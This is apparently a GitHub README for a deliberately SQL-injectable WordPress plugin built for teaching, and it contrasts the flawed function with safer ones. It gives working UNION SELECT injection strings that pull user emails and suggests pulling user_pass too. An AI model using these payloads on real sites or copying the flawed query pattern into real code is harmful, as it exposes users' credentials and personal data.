Skip to content
A WordPress plugin that is vulnerable to SQL injection.
PHP
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE
README.md
sql-vuln-wordpress-footer-plugin.php

README.md

SQL Vulnerable Footer

WARNING: This plugin should NEVER be run in a production environment. It should only be run on a local development site.

This plugin exposes an SQL Injection Vulnerability.

Functionality

When adding ?id={user_id} to a URL, the display_name for the user will be displayed in the footer.

Examples

On my local site, adding ?id=1 displays

User 1 Display Name is Sal Ferrarello

in the footer.

How to Exploit the SQL Vulnerability

Adding a UNION SELECT allows you to access other information, e.g.

Get Email Addresses

?id=1 UNION SELECT user_email as display_name from is_users LIMIT 100 OFFSET 1

You can increment the final number to see other email addresses, e.g.

?id=1 UNION SELECT user_email as display_name from is_users LIMIT 100 OFFSET 2

Other Database Columns

By replacing user_email with another database column in the WordPress User table (e.g. user_pass), you can view the information in that column.

More Secure Implementations

This plugin includes three functions that get a user's display name,

  • bad_get_display_name() default, has an SQL Injection Vulnerability
  • better_get_display_name() SQL Injection Vulnerability eliminated
  • best_get_display_name() uses native WordPress functions instead of querying the database directly, thereby eliminating the vulnerability

Additional Reading

Contributors

Sal Ferrarello / @salcode

You can’t perform that action at this time.